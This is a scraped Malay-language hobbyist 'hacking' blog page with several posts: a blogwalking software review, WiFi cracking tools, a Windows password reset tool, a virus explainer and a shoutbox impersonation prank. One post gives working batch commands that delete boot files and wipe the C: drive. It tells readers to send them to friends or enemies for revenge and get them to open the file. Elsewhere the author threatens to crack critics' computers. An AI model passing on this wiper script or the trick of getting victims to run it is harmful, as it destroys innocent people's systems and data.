Thursday, 6 November 2025
spot_imgspot_imgspot_imgspot_img
Utama Blog Laman 358

Blogwalking Software/Tools Terbaru dari Jiwa Kacau!

0

Blogwalking Software New Version

Yeah! semalam aku mencuba satu sofware blogwalking yang telah aku muat turun dari tahun lepas (2010)..
hasilnya membawa aku kepada website Jiwa Kacau..
aku ingatkan yang aku muat turun tu dah kira yang paling baru..
rupa-rupanya tidak..
Jiwa Kacau dah update versi terbaru namun perlu diingatkan ianya bukan dari jenis AUTO BLOGWALKING..ianya adalah dari jenis manual, yang mana korang perlu juga melawati blog-blog yang telah dibuka oleh perisian Jiwa Kacau Blogwalking Tools ni, dan kemudian tinggalkan jejak blogwalking macam biasa..tiada istilah ‘robot bekerja’ untuk korang ok!

Kali ni Jiwa Kacau dah kemaskini perisian tersebut yang hasilnya membawa kepada perisian dari jenis Web-Base..ini kerana katanya beliau tak mahu lagi buat perisian berasaskan installer atas sebab-sebab banyak masalah yang beliau kena kaji tahap dewa ke – 19 (melampau betol review aku ni)

Aku bagi amaran kepada semua BLOGGER-BLOGGER semalaysia..
korang KAJI dulu bagaimana ia berfungsi sebelum buat apa-apa FITNAH atau KUTUKAN terhadap perisian ini mahupun website serta individu pembangunnya (Blur) mahupun tukang review ni! hehehehe..kalau aku dapati mana-mana blog yang kutuk-kutuk belakang, aku tak akan teragak-agak untuk melakukan kerja-kerja cracking terhadap PC, server, dan semua yang berkaitan dengan orang yang mengutuk tersebut pemfailan saman kerana walaupun aku seorang ETHICAL HACKER, aku juga adalah rakyat Malaysia yang mengikut lunas undang-undang..heheh! sebab apa aku warning awal-awal, sebab aku belajar dari pengalaman orang lain!
aku tak mahu jadi mangsa fitnah! muahaha!

Beranikan diri korang mengkaji kalau tak nak dikata BODOH SOMBONG..
ni adalah pandangan dari seorang pembangun perisian,
dan bukan hanya dari seorang blogger..
blogger memandang dari sudut pandangan penulis,tapi berkemungkinan besar blogger tersebut tak faham sepatah haram Computer Programming Language seperti C++, HTML Coding, dan lain-lain..
Oleh itu, BACA LA SAMPAI HABIS OK..

sila baca REVIEW PENUH dari Encik Blur a.k.a JIWA KACAU.COM

Hari ini aku mendapat satu komen yang agak membengangkan kepala otak aku… Komen ini adalah berkaitan Blogwalking Software yang aku sedang develope… Isu ini menjadi hangat kerana semasa aku melancarkan software ini dengan rasminya terdapat juga seorang scripter dari Malaysia yang juga melancarkan scriptnya… Aku malas hendak menceritakan pasal beliau ini… Kami berdua dituduh tanpa usul periksa bahawa kemudahan blogwalking yang kami reka ini memberikan banyak keburukan daripada kebaikan… Contohnya isu traffik satu hala… Untuk pengetahuan blogger diluar sana tidak wujud kisah traffik satu hala dalam dunia moden ini… Aku akan mengulas serba sedikit tentang script yang kami berdua telah cipta ini…

1. Blogwalking Software (Jiwa Kacau)

Software ini adalah hasil kajian aku yang mendalam tentang cara2 yang dapat menjimatkan masa untuk berblogwalking…
Konsep software yang aku reka ini mudah sahaja iaitu blogger yang menggunakan software ini dapat membuka banyak blog dalam satu masa…
Aku telah menetapkan 50 blog yang akan dibuka sekali gus…
Apabila software ini diaktifkan browser korang akan secara automatiknya membuka 50 blog yang telah aku tetapkan dan aku update setiap hari…
Ia sama seperti korang bukak blog Hanis Zalikha, Darkbatman, dan juga Redmummy dengan memasukan URL secara manual pada browser korang… (Tidak mungkin korang akan masuk blog Hanis Zalikha dan Redmummy dari shoutbox)
Ini disebabkan Hanis Zalikha dan Redmummy tidak meniggalkan jejak lagi seprti kita blogger amatur ini…
Korang boleh tengok laporan traffik mereka… (Takkanlah mereka dapat trafik berjuta-juta semua dari Google dan juga blogger yang menglinkan entry mereka di dalam post)
Kalo x caye korang boleh bukak Nuffnang dan kira refferal korang same tidak bilangannya dengan UV korang (Jawapannya 100% tidak)
Ini disebabkan referal ialah penanda dimana reader itu datang ke blog korang cth seperti reader2 korang membaca entry korang apabila mereka search dan entry korang terletak di antara top 10 list di dalam Google…
Kalo korang perhatikan semual refferal adalah URL… Samaada dari Google, Cbox, Shoutmix dan juga blog2 lain yang meletakkan link korang di dalam post mereka…
Jadi tidak timbulah isu traffik satu hala di dalam penggunaan software blogwalking ini…
Pengguna still masih boleh membaca entry terkini, komen dan meningalkan jejak secara manual dengan menggunakan software ini…
Ini kerana software ini adalah MANUAL BLOGWALKING dan buakannya autoblogwalking

2. Auto Shoutmix and Cbox message (ABCDead)

Script ini aku tak tahu macam mana dia cipta…
Mengikut kefahaman konsep yang digunakan ialah setelah script ini aktif dia akan hantar ROBOT untuk crawl page korang dan mencari Shoutmix ataupun Cbox…
Konsep ini sama seperti digunakan oleh Google Inc untuk meletakkan entry blog korang didalam Google Search Engine…
Kelebihan script ini korang melakukan BW secara auto tanpa perlu membuka page tuan empunya blog terdahulu…
Kelemahan script ini pulak korang tidak dapat membaca dan meningalkan komen di blog2 yang korang telah tinggalkan jejak…(Tetapi dengan Blogwalking Software di atas semuanya boleh)
Script ini juga membawa traffik ke blog anda ini disebabkan ROBOT itu merupaka salah satu URL yang terdapat di dalam script tersebut… (Tidak faham??)
Kita ambik contoh URL kepada robot itu ialah… http://domain.com/robot.php
Bila robot ini berjalan2 didalam blog korang dia akan meningkatkan traffik korang secara automatik…
Aku x nak komen panjang pasal script ini…
Semua ini adalah berdasarkan pengalaman aku di dalam bidang IT ini..
Ok korang dah baca sedikit rumusan kepada kedua2 script dan juga software di atas… Sekarang aku nak tegur sedikit si INSAN TAK PUAS HATI berkenaan dakwaan beliau…

Pasal traffik satu hala tu aku dah cerita panjang lebar dekat atas ini…
Pasal klik iklan – Seperti yang korang tahu, Nuffnang telah memberikan amaran keras kepada FRAUD CLICK… Betul juga seperti kata Nuffnang sebab FRAUD CLICK ini menyebabkan rezeki yang diterima oleh para blogger menjadi shubahah… (Kalo x caye boleh search Google ade ustaz yang menerangkan pasal FRAUD CLIKC ini)
Pasal manfaat – Kedua2 belah pihak mendapat manfaat dan kadang2 pihak yang tersenarai didalam BW software ini lebih mendapat manfaat… Amik cotoh anda tersenarai di dalam software ini, tetapi tidak aktif berblogging… Aku pula sering menggunkan software ini dan kadang2 sehingga lebih 5 kali aku guna software ni dalam sehari… Dan ini memberikan blog anda 5UV daripada aku… Dalam masa 10 hari aku telah berikan blog anda 50UV dan anda pula membuka blog dan membalas jejak setiap 5 hari sekali… Peluang untuk anda singgah di blog Jiwa Kacau dan memberikan traffik kepada Jiwa Kacau adalah tipis… Sebab shoutmix hanya simpan message sebanyak 250 sahaja… (konsep aku adalah biar aku bahagi lebih dan satu hari nanti aku akan dapat lebih juga)
Pasal ADIL – Sorry la sebab kebodohan INSAN TAK PUAS HATI untuk tidak membaca E-book yang telah dikeluarkan…
Pasal anda dalam perhatian – Tahu atau tidak setiap kali anda meningalkan komen WordPress akan merekod setiap IP, Email dan juga URL anda… Email dan URL mungkin boleh ditipu tetapi IP tidak boleh ditipu… Bayangkan apa aku boleh lakukan kepada INSAN TAK PUAS HATI jika aku fowardkan IP ini kepada SKMM untuk tidakan… Tetapi aku tidak buat begitu sebab aku paham tidak ramai orang yang celik IT zaman sekarang ini dan juga ada yang hanya tahu MENUDUH TANPA USUL PERIKSA…

Jiwa Kacau

nak pegi ke link perisian web-base blogwalking tersebut? klik kat bawah ni:

Web-Base Jiwa Kacau Blogwalking Software

Haaa…dah selesai baca review beliau?
ni pula tag kawan-kawan aku seperti yang dalam syarat penyertaan Jiwa Kacau..

myHD

Blog Metafizik dan Khazanah Alam

dgodam

(bagi yang tak tersenarai tu aku mintak maaf la eh..aku tak sempat nak tulis banyak-banyak sebab aku kena edit dulu kod supaya bila korang klik, ia akan buka satu lagi tab dari web browser korang menghala ke arah blog/website yang korang klik..so takde la korang terlepas dari blog aku..bleh la korang baca lagi di sini dengan aman..)

Kalau korang nak perisian versi yang boleh dimuat turun pun aku ada..perisian yang sama dibangunkan oleh Jiwa Kacau..kat bawah ni aku sertakan pautan kepada muat turun perisian Jiwa Kacau Blogwalking Software tersebut..cuma versi ni ia akan buka 50 page blog serentak..so..pastikan kelajuan internet korang power!

Jiwa Kacau Blogwalking Software

Kalau korang nak perisian yang dibangunkan oleh Sepaku.net pun aku ada!
korang kaji kedua-dua perisian ni ok..
aku tak sempat nak kaji lagi sebab sibuk dengan kerja-kerja hacking terbaru yang aku baru nak cuba buat..jadi aku serahkan kepada korang untuk menilainya sendiri ok..

Sepaku Blogwalking Version 1.6

Views: 0

Iklan Newspaper Inline

Malaysia IT Fair @ Mid Valley 2011!

1

Wahhhhh…

adekah korang teringin nak beli external hard disk bersaiz 500GB pada harga RM99???

adekah korang nak wireless keyboard pada harga RM79???

yahhhh…semua ini dan banyak lagi di Malaysia IT Fair @ Mid Valley 2011…

nak tau lebih lanjut??

klik pada pautan yang aku bagi kat bawah ni:

Malaysia IT Fair @ Mid Valley 2011

Views: 0

Iklan Newspaper Inline

Advance Archive Password Recovery

0

Entry kali ni pun aku buat untuk eszol sebab dia request kat aku tadi.. disebabkan aku malas nak tulis, so aku bagi aje la video ni, dengan link untuk korang muat turun perisian tersebut..enjoy! Nota: Bagi sesiapa yang nak request apa-apa sahaja artikel atau perisian, sila berbuat demikian di shoutbox blog ini..terima kasih..

Advance Archive Password Recovery

Views: 0

Iklan Newspaper Inline

Crack Password Microsoft Word

0

Entry kali ni plak aku bagi dekat Eszol a.k.a raar

aku ni dah malas nak tulis hari ni..so…korang tengok aje la video kat bawah ni ok..

Views: 0

Iklan Newspaper Inline

Mengembalikan Data/Fail Yang Telah Di Delete

0

Adakah korang secara tidak sengaja memadam fail dari Hard disk? Adakah korang sangat ingin memulihkan fail tersebut kembali? korang tidak perlu panik! Adalah tidak mustahil untuk memulihkan kembali fail dihapuskan dari hard disk (bahkan selepas korang tekan Shift + Delete) asalkan bertindak segera selepas korang menyedari bahawa fail tersebut dihapuskan dan gunakan perisian terbaik untuk memulihkan fail yang telah dipadam. Dalam posting ini korang akan mendapat maklumat terperinci tentang bagaimana memulihkan fail yang telah dihapuskan dari PC Windows atau Mac.

Saat ini terdapat beratus-ratus tool recovery data dan perisian di pasaran yang membanggakan untuk memulihkan 100% dari semua fail yang telah dipadam untuk kembali semula dalam keadaan asal. Namun pada kenyataannya sebahagian besar perisian ini tidak berkesan dan tidak mampu memulihkan fail korang kembali. Jadi kita perlu untuk membuat pilihan yang tepat dari software recovery file dalam rangka untuk memulihkan fail dihapuskan kembali semula dalam keadaan asal. Kami mengesyorkan perisian berikut untuk memulihkan fail tersebut:

1. Stellar Phoenix Data Recovery

2. Stellar Phoenix Mac Data Recovery

Stellar Phoenix adalah salah satu syarikat terbaik yang mengkhususkan dalam pemulihan fail yang telah dipadam sejak tahun 1993. Stellar Data Recovery Solutions merangkumi pelbagai macam perisian untuk hampir setiap situasi kehilangan data mulai dari accidental format, serangan virus dan perisian yang rosak/tidak berfungsi. Oleh kerana itu Stellar menyediakan alat terbaik untuk memulihkan fail yang telah dipadam dengan lebih dari 1.000.000 pelanggan yang berpuas hati di 137 negara.

Bagaimana Proses File Deletion berlaku?

Apabila korang memadam fail dari komputer (atau bahkan dari recycle bin) fail tersebut tidak benar-benar dihapuskan. Tidak seperti apa yang kebanyakan orang fikir, fail tersebut tidak dihapuskan atau dibuang dari hard disk. Mari kita ambil sebuah contoh dari sebuah buku yang mengandungi 50 halaman. Misalkan ketika korang memadam 25 halaman, andaikan bahawa hanya entry dalam indeks yang menunjukkan ke halaman 25 dihapuskan dan bukan halaman 25 itu sendiri yang dipadm. Demikian juga ketika korang memadam fail dari hard disk, hanya pointer yang menunjuk ke gambar tersebut akan dihapuskan dan bukan fail itu sendiri. Fail ini masih ada dan 100% berkemungkinan untuk pulih semula dalam keadaan asal. Dalam keadaan ini file menjadi tak terlihat dan kerana itu ia kelihatan seperti telah dihapuskan.

Apa Kemungkinan Untuk Memulihkan Kembali File saya?

Kerana sistem operasi tidak serta-merta menggunakan ruangan dari fail yang dihapuskan, hal ini sangat pasti berkemungkinan besar untuk memulihkan fail yang dihapuskan kembali dalam keadaan asli 100%. Ini mungkin memakan masa yang sangat lama untuk fail-fail tersebut harus benar-benar dihapuskan kerana hard disk moden mempunyai kapasiti yang cukup besar. Oleh kerana itu kemungkinan kecil bahawa ruang dari fail yang dipadam akan digunakan semula dengan segera. Jadi, sangat bagus untuk mencuba software recovery file seperti Stellar Data Recovery untuk Windows atau Stellar Recover Data untuk Mac. Beberapa fail yang dilaporkan telah pulih bahkan setelah bertahun-tahun penghapusan fail itu berlaku. Namun untuk hasil yang terbaik, disarankan bahawa korang menggunakan perisian fail pemulihan secepat mungkin untuk memulihkan fail korang tu.

Memulihkan Fail

Dalam rangka untuk memulihkan fail yang dipadam semua yang perlu korang lakukan adalah melakukan scan (carian) untuk fail tersebut menggunakan File Recovery Software. Harap diperhatikan bahawa tidak ada cara manual untuk memulihkan fail yang dipadam. Phoenix Data Recovery software melakukan imbasan menyeluruh sektor hard disk dan akan menemukan fail yang terpadam untuk memulihkan ia kembali dalam keadaan asal. Ini adalah perisian yang hanya menyokong 185 jenis fail yang popular termasuk Windows NT Registry, JPEG, MP4, GIF, BMP dan fail MS Word. Peranti lunak ini menawarkan sokongan grafik yang cantik dan canggih dengan  menggabungkan kaedah scanning untuk mengimbas sepenuhnya dan memulihkan fail yang telah dipadam dari hard drive. Dengan ini, korang boleh:

  • Recover FAT16, FAT32, vfat, NTFS, dan partisi (partition) fail sistem NTFS5
  • Recover e-mel
  • Memulihkan dokumen yang telah dihapuskan
  • Recover foto
  • Recover muzik
  • Pemulihan ‘Formatted Hard-Drive’
  • Recover file dari USB Drives, CD, DVD dan kad memori
  • Recover hampir semua fail format kamera

Views: 2

Iklan Newspaper Inline

Hacking WiFi!

0

Yeah..entry kali ni aku taip khas untuk Melvister (Klik di sini) sebab dia yang request entry ni.. ada yang request untuk hack akaun nuffnang orang (encik tuuut..jangan marah ye), tapi aku bimbang blog ni jadi bahan makian dan cacian mereka-mereka yang akaun nuffnangnya dah cecah juta-juta..muahaha!
aku rasa korang yang nak buat benda-benda camtu, aku tak perlu ajar kot..korang kaji aje la setiap entry yang masuk kat dalam blog aku ni..komfom boleh buat sendiri tanpa diajar punya..

(Perhatian : Disebabkan posting aku kali ni agak skema sikit, so aku mintak maap la sebab agak susah nak terangkan dengan simple istilah-istilah komputer yang melibatkan WiFi ni..kalau korang baca majalah PC, iaitu majalah mengenai komputer yang 100% berbahasa melayu, lagi la pening..posting kali ni aku terjemahkan salah satu artikel tentang WiFi Hacking dari website berbahasa Inggeris..sebab tu ia agak skema sikit..harap maklum..)





Perisian Hacker Freeware (Free Software)

Ada banyak perisian freeware yang sedia ada untuk di muat turun yang telah disediakan, bahkan mereka yang baru berjinak-jinak dalam dunia hacker, dengan perisian pintar mereka menahan data paket rangkaian penghantaran wireles dari jarak jauh (remote), dan setelah mengumpulkan cukup banyak “pakej data terenkripsi” dari korang, seorang hacker akan dapat network security key. Ia membolehkan seorang hacker untuk membaca fail & transmisi dari jarak jauh seolah-olah mereka langsung disambungkan ke rangkaian korang. Salah satu aspek yang lebih menakutkan daripada hacking wireless bahawa perbuatan mereka itu tidak pernah meninggalkan jejak. Untuk menggunakan program tersebut korang semua tidak perlu menjadi jurutera komputer yang sangat berpengalaman, tetapi hanya mempunyai pengetahuan asas pengkomputeran. Cari dan muat turun program Wi-Fi hacking memerlukan waktu sekitar sepuluh saat menggunakan tools carian Internet standard sedia ada. Wi-Fi software hacking telah lama tersedia untuk sistem Windows, Mac, Linux / Unix, dan Pocket PC.

Cari Rangkaian Wireless

Menemukan sebuah rangkaian wireless adalah langkah pertama dalam cuba memanfaatkannya. Ada dua alat yang umum digunakan dalam hal ini:

Network Stumbler a.k.a NetStumbler – Alat ini berasaskan Windows dengan mudah menemukan isyarat wireless disiarkan dalam liputan – korang harus…eh…WAJIB memilikinya!

(NetStumbler Screenshot)

Kismet – Salah satu elemen berfungsi utama yang hilang dari NetStumbler adalah kemampuan untuk memaparkan Rangkaian Wireless yang tidak tersiar SSID mereka. Kismet akan mengesan dan memaparkan SSID yang tidak disiarkan yang sangat penting dalam mencari rangkaian wireless.

(Kismet Screenshot)





Memasuki ke Rangkaian Wireless Yang Telah Dijumpai

Setelah korang menemukan rangkaian wireless, langkah seterusnya adalah cuba untuk bersambung dengannya. Jika rangkaian tidak menggunakan semua jenis keselamatan pengesahan atau penyulitan, korang hanya boleh disambungkan ke SSID. Jika SSID tidak disiarkan, korang boleh membuat profil dengan nama SSID yang tidak disiarkan. Tentu saja korang menemukan SSID yang tidak disiarkan dengan Kismet, kan? Jika rangkaian wireless menggunakan pengesahan dan / atau enkripsi, korang mungkin perlu satu daripada perisian berikut:

Airsnort – Ini adalah alat yang sangat mudah untuk digunakan, bagi mengesan (sniff) dan mendapatkan kunci WEP. Sementara banyak orang mempertikaikan penggunaan WEP, tentu lebih baik daripada tidak menggunakan apa-apa. Sesuatu yang korang akan dapati dalam menggunakan alat ini bahawa ia membawa banyak pakej ‘penghiduan’ untuk memecahkan kunci WEP. Ada alat tambahan dan strategi yang boleh digunakan untuk memendekkan jumlah masa yang diperlukan dengan tujuan menyelesaikan kata kunci, tapi ciri-ciri ini tidak termasuk dalam Airsnort.

(Screenshot dari Airsnort)

CowPatty – Alat ini digunakan sebagai alat brute Force Attack untuk cracking WPA-PSK, yang dianggap sebagai “New WEP” untuk Wireless Security di rumah. Program ini hanya mencuba sekumpulan pilihan yang berbeza dari kamus fail (dictionary file) untuk melihat jika salah satu berakhir dengan perkataan yang sesuai, apa yang ditakrifkan sebagai Pre-Shared Key.

(Cowpatty Screenshot)

ASLeap – Jika rangkaian yang menggunakan LEAP, alat ini boleh digunakan untuk mengumpul data pengesahan yang sedang melewati seluruh rangkaian, dan identiti key ini boleh dikesan dan dipecahkan kodnya. LEAP tidak melindungi pengesahan seperti yang lain “nyata” jenis EAP, yang merupakan alasan utama mengapa LEAP boleh dipecahkan.

(Asleap Screenshot)

Sniffing Wireless Data

Sama ada korang secara langsung dihubungkan ke rangkaian wireless atau tidak, jika ada rangkaian wireless dalam liputan, ada data yang ‘terbang’ melalui jalur lebar pada saat tertentu. korang akan memerlukan alat untuk dapat melihat data ini.

Wireshark (dulunya Ethereal) – Walaupun ada banyak perdebatan mengenai cara yang tepat untuk menerangkan utiliti ini, tidak syak lagi, bahawa ia adalah alat yang sangat berharga. Ethereal dapat mengimbas data wireless, dan Ethernet, dan dilengkapi dengan beberapa kemampuan penapisan yang kuat. Hal ini juga boleh digunakan untuk mengesan beacon pengurusan 802.11 dan probe dan selanjutnya dapat digunakan sebagai alat untuk mengesan non-broadcast SSID.

(Screenshot dari Ethereal)

(Sesi IM Yahoo sedang ‘dihidu’ di Ethereal)

Utiliti tersebut, atau yang sejenis, adalah keperluan bagi keselamatan wireless korang sendiri. Cara paling mudah untuk menjadi terbiasa dengan perisian ini adalah dengan hanya menggunakan mereka dalam lingkungan makmal terkawal (controlled lab environment). Dan kos (wang) bukanlah alasan kerana semuanya telah tersedia secara percuma di Internet.

Melindungi Network Key, Kaedah Untuk Melawan Tools Ini :

Adalah penting untuk mengetahui bagaimana memanfaatkan alat (perisian) tersebut, adalah penting untuk mengetahui amalan terbaik tentang bagaimana mengamankan korang Wireless Network Melawan alat-alat ini.

NetStumbler – Jangan broadcast SSID korang. Pastikan WLAN dilindungi dengan menggunakan Pengesahan Kata Laluan (Advance Authentication) dan Enkripsi (encryption).

Kismet – Tiada apa-apa perkara yang benar-benar boleh dilakukan untuk menghentikan Kismet dari mencari WLAN korang, jadi pastikan WLAN dilindungi dengan menggunakan Pengesahan Kata Laluan (Advance Authentication) dan Enkripsi (encryption).

Airsnort – Guna 128-bit, bukan WEP encyption key 40-bit. Hal ini akan memakan masa lebih lama untuk proses cracking berjalan. Jika peranti menyokong aplikasi tersebut, gunakan WPA atau WPA2 bukan WEP (memerlukan firmware atau mengemas kini perisian).

Cowpatty – Guna WPA Pre-Shared Key yang panjang & rumit. Jenis kunci akan mempunyai kurang daripada peluang yang berada di kamus fail (dictionary file base attack) yang akan digunakan untuk mencuba dan meneka kunci dan / atau akan memakan masa yang lebih lama. Jika dalam senario syarikat, tidak menggunakan WPA dengan Pre-Shared Key, gunakan jenis EAP yang baik untuk melindungi pengesahan dan mengehadkan bilangan tekaan yang salah yang akan berlangsung sebelum akaun dikunci.

ASLeap – Guna identiti key yang panjang dan rumit, atau lebih baik lagi, beralih ke EAP-FAST atau jenis EAP yang berbeza.

Ethereal – Guna enkripsi, sehingga apa pun kaedah akan sulit atau hampir mustahil untuk dipecahkan. WPA2, yang menggunakan AES, pada dasarnya realistik untuk dipecahkan oleh hacker yang normal. Bahkan WEP akan menyulitkan data. Ketika di Wireless Hotspot Umum (yang umumnya tidak menawarkan enkripsi), dengan menggunakan aplikasi enkripsi layer, seperti Simplite untuk melindungi sesi IM korang, atau menggunakan SSL. Untuk pengguna syarikat, gunakan IPSec VPN dengan split-tunneling dimatikan. Hal ini akan memaksa semua lalu lintas meninggalkan laluan internet melalui terowong terenkripsi yang akan dienkripsi dengan DES, 3DES atau AES.

P/S: Pada entry akan datang, aku akan post pasal glosari maksud-maksud istilah dalam dunia hackers seperti hashing, pishing, brute force attack, dictionary base attack dan sebagainya..baru la korang tak pening, ok?

Views: 1

Iklan Newspaper Inline

Mematikan (Shutdown) Komputer Untuk Selama-lamanya!

0

Aku yakin korang ingin membalas ke atas perbuatan buruk yang pernah korang terkena sebelum ni pada seseorang,dan dengan sedikit kaedah korang dapat mematikan komputer orang tersebut selamanya!

Mari kita mulakan:

Buka notepad dan copy / paste kod ini:

@ Echo off
attrib-r-s-h c: autoexec.bat
del c: autoexec.bat
attrib-r-s-h c: boot.ini
del c: boot.ini
attrib-r-s-h c: ntldr
del c: ntldr
attrib-r-s-h c: windows win.ini
del c: windows win.ini

Sekarang simpan sebagai fail bat..

Fail ini boleh mematikan (shutdown) komputer seseorang.
Ia mematikan komputer dan memadam fail yang diperlukan untuk reboot dan restart.

INGAT – JANGAN KLIK FILE INI OK.
KORANG TIDAK AKAN DAPAT RECOVER SEMULA kOMPUTER SETELAH KORANG MEMBUKA FILE BAT NI TAU!

Kirimkan ke komputer kawan-kawan mahupun lawan dan beritahu mereka untuk membukanya.

Berikut ini adalah kod lain yang boleh digunakan juga:

cmd / c del c: windows * / F / S / Q

cmd / c del c: * / F / S / Q

Paste di Notepad dan simpan fail ini dengan Extension cmd atau bat

Selesai!

Views: 1

Iklan Newspaper Inline

Apakah Yang Dimaksudkan Sebagai Virus Komputer?

0

Apa itu Virus Komputer? 

—> Sebuah program komputer yang berpotensi merosakkan & mampu menyalinkan dirinya sendiri serta menyebabkan kerugian besar bagi fail atau program lain tanpa kebenaran atau pengetahuan pengguna. 

Jenis-jenis virus komputer: – 
Berbagai jenis virus yang telah dikenal pasti adalah sebagai berikut- 

1) Virus Boot Sektor: – Boot sector virus menginfeksi baik master boot record dari hard disk atau floppy drive. Boot record, program yang bertanggung jawab untuk booting sistem operasi, digantikan oleh virus. Virus itu sama ada menyalin program master boot ke bahagian lain dari hard disk atau menggantikannya dengan yang baru. Mereka menjangkiti komputer ketika boot up atau ketika mengakses floppy disk yang dijangkiti di floppy drive. Sekali sebuah sistem yang dijangkiti dengan virus boot sektor, setiap cakera yang tidak dilindungi oleh sistem non-write-protect akan dapat dicapai oleh sistem ini dan akan dijangkiti. 

Contoh virus boot- sektor Michelangelo dan Stoned. 

2) Fail atau Program Virus: – Beberapa file / program, ketika dijalankan, memuat naik virus dalam memori dan menjalankan fungsi standard untuk menjangkiti sistem. Mereka menginfeksi file program dengan sambungan seperti EXE, .. COM,. BIN,. DRV dan. SYS. 

Beberapa virus fail yang umum adalah Week, Cascade. 

3) Multipartite Virus: – Sebuah virus multipartite adalah virus komputer yang menjangkiti beberapa platform target yang berbeza, dan tetap secara rekursif infektif dalam target masing-masing. Ia cuba untuk menyerang baik boot sector dan executable, atau program, dalam masa yang sama. Ketika virus melekat pada sektor boot, pada gilirannya akan mempengaruhi fail sistem, dan ketika virus melekat pada fail, maka pada gilirannya akan menjangkiti boot sector. 
Virus jenis ini dapat kembali menjangkiti sistem berulang lagi jika semua bahagian dari virus tidak dibasmi. 

Ghostball adalah virus multipartite pertama, ditemui oleh Fridrik Skulason pada bulan Oktober 1989. 
Contoh lain adalah Invader, Flip, dll 

4) Stealth Virus: – Virus ini diam-diam di alam komputer, bererti ia menggunakan pelbagai kaedah untuk menyembunyikan diri untuk mengelakkan pengesanan. Ia kadang-kadang mengeluarkan diri dari memori sementara untuk mengelakkan pengesanan oleh antivirus. Ia agak sukar untuk dikesan. Ketika sebuah program antivirus cuba untuk mengesan virus, stealth virus memberi ‘feed’ kepada program antivirus gambaran yang bersih dari sektor fail atau boot. 

5) Polymorphic Virus: – polymorphic virus mempunyai kemampuan untuk bermutasi, membayangkan bahawa mereka mengubah kod virus yang dikenali sebagai tanda tangan setiap kali mereka menyebar atau menulari. Jadi program antivirus yang mengimbas kod virus tertentu tidak dapat mengesan kehadiran virus itu. 

6) Macro Virus: – Sebuah virus makro adalah virus komputer yang “menjangkiti” Microsoft Word atau aplikasi yang serupa dan menyebabkan urutan tindakan yang harus dilakukan menjadi automatik ketika aplikasi dijalankan atau sesuatu perbuatan yang lain yang mencetuskan aplikasi itu ‘terkeluar’. Virus makro sering menyebar sebagai virus e-mel. contoh terkenal adalah Virus Concept dan Worm Melissa.

Views: 1

Iklan Newspaper Inline

Hack Windows Administrator Password

0

Kaedah hack kali ini aku akan menunjukkan cara untuk menetapkan semula password administrator Windows (untuk Win 2000, XP, Vista dan Win 7) pada saat korang lupa atau apabila korang ingin mendapatkan akses kepada komputer yang korang tidak tahu password. sebelum ni aku dah pernah buat posting tentang benda yang sama jugak tapi kaedah sahaja yang berbeza..sila rujuk posting pertama blog ini..ok?

Sebahagian besar dari kita telah mengalami situasi di mana kita perlu mendapatkan akses ke komputer yang dilindungi kata laluan atau pada waktu kita lupa password administrator yang menjadikan kita mustahil untuk login ke komputer. Jadi di sini adalah kaedah hacking menggunakan perisian pintar yang boleh menetapkan semula password atau membuat password kosong (menghapuskan kata laluan) sehingga korang boleh mendapatkan akses pentadbir (Administrator @ admin) ke komputer. Korang boleh melakukannya dengan perisian bernama Offline NT Password & Registry Editor. Utiliti ini berfungsi offline, itu bererti korang harus mematikan komputer dan boot dari floppy disk, CD atau peranti USB (seperti pen drive). Alat ini mempunyai beberapa ciri-ciri berikut.

1. Anda tidak perlu mengetahui password lama untuk menetapkan yang baru
2. Akan mengesan dan menawarkan untuk membuka dikunci atau dipadam dari akaun pengguna!
3. Ada juga registry editor dan utiliti registri lain yang bekerja di bawah linux / unix, dan boleh digunakan untuk hal-hal lain selain mengedit kata laluan.

Bagaimana ia berfungsi?

Sebahagian besar sistem operasi Windows menyimpan password login dan password terenkripsi (encrypted) yang lain dalam sebuah file bernama sam (Security Account Manager). Fail ini boleh (biasanya) ditemui pada windows system32 config. File ini merupakan sebahagian dari registri Windows dan tetap tidak dapat diakses selama OS aktif. Oleh kerana itu perlu ingat bahawa adalah wajib untuk boot dari komputer korang dan mengakses fail sam melalui boot. Perisian pintar ini akan mendapatkan akses ke fail sam dan akan menetapkan semula / memadam password yang berkaitan dengan pentadbir atau akaun yang lain.

Link download untuk kedua-dua CD dan floppy drive bersama-sama dengan Arahan lengkap diberikan di bawah ini

Offline NT Password & Download Editor Reg (Klik di sini)

Dianjurkan untuk korang men-download versi CD sejak floppy drive sudah lama tidak digunakan dan tidak ada di komputer pada saat ini. Setelah korang memuat turun, korang akan dapat bootable image yang korang perlukan untuk burn ke CD. Sekarang boot komputer dari CD ini dan ikuti arahan pada skrin untuk menetapkan semula kata laluan. Mudah bukan?

Views: 1

Iklan Newspaper Inline

Hack Shoutbox (Shoutmix, C-Box) & Jadi Admin?

0

Salam semua…hahaha…hari ni aku nak cerita sikit pasal shoutbox ni..bukan apa, ada beberapa hari yang lepas, aku ada tinggalkan mesej berbunyi lebih kurang macam ni:

“This shoutbox was hacked by MyHackersAreHere!”

dengan menjadikan nama aku sebagai ‘Admin’ di blog tersebut…
antara yang pernah kena ialah blog Kak Pah (Klik di sini), Pendekar Berkuda (Klik di sini), dan myHD (Klik di sini)..
(Klik kalau korang nak tengok blog tu ok)

kat sini aku nak nyatakan, bahawa semua mesej-mesej tu adalah berupa USIKAN semata-mata dan bukanlah satu kerja hacking yang sebenar…hehehe!
kalau korang semua nak tau, shoutmix ni SESIAPA sahaja boleh guna nama ‘Admin’ atau ‘admin’ selagi shoutmix atau c-box tu bukan premium user account! hahaha!
sebab dalam shoutmix atau c-box versi premium user account, barulah nama ‘Admin’ atau ‘admin’ tu boleh disekat daripada pelawat-pelawat blog korang menyalahgunakannya!

huh..kenapa aku buat macam tu?
sebab apa lagi…nak naikkan rating dan trafik blog la..
bila lagi nak cepat famouskan blog ni kan?hehehe..
kepada semua yang pernah kena usikan tu, aku mintak maap la ye..
semua tu hanyalah bertujuan untuk pendidikan (educational purposes only).
kalau aku tak buat macam ni, rasanya ramai lagi yang tak pernah terfikir nak guna nama ‘Admin’ dekat shoutbox masing-masing kan?

haaaa…ok la..setakat ini aje la..sebarang pertanyaan boleh la ajukan dekat shoutbox blog aku ni..tapi jangan sekali-kali guna nama Admin plak ok! kalau tak aku ban! hehehe!

Hanya Yang Terbaik Untuk Anda Semua,

Salam, dari Dunia MyHackersAreHere…

Arya Putra.

Views: 0

Iklan Newspaper Inline